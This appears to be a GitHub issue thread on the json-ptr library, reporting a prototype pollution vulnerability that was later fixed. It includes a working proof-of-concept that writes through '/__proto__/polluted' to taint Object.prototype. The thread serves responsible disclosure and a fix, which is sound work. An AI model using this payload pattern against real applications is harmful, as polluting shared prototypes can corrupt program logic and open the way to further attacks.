flitbit / json-ptr

A complete implementation of JSON Pointer (RFC 6901) for nodejs and modern browsers.
MIT License

Prototype pollution (Fixed) #26

Status: Closed (closed by luci-m-666 3 years ago)

luci-m-666 commented 3 years ago

Hi, this package is vulnerable to prototype pollution. PoC:

var { JsonPointer } = require("json-ptr")
var obj = {}
console.log("Before : " + obj.polluted);   // prints "Before : undefined"
// force=true creates missing intermediates; "__proto__" is not missing, it resolves
// to Object.prototype, so the final step writes onto the shared prototype.
JsonPointer.set(obj, '/__proto__/polluted', 'Yes! Its Polluted', true);
var obj1 = {}                              // a brand-new, unrelated object
console.log("After : " + obj1.polluted);   // prints "After : Yes! Its Polluted"

Fixed prototype pollution in util.ts. Thanks.

flitbit commented 3 years ago

Thanks for the PR. I added a test; since pollution is now disallowed, I test that the error is thrown.

flitbit commented 3 years ago

Will be v2.0.0 shortly; seems it is potentially a breaking change if someone was using such pointers.

luci-m-666 commented 3 years ago

Glad to be of help.

alromh87 commented 3 years ago

Hello @luci-m-666, I'm a little curious as to how you found prototype pollution in the library and how you came up with these exact lines:

https://github.com/418sec/json-ptr/pull/1/files#diff-3294a832ea2276e554177e0b3007cc2d401c082912c7fbde49fa09141bf1aed1R175-R177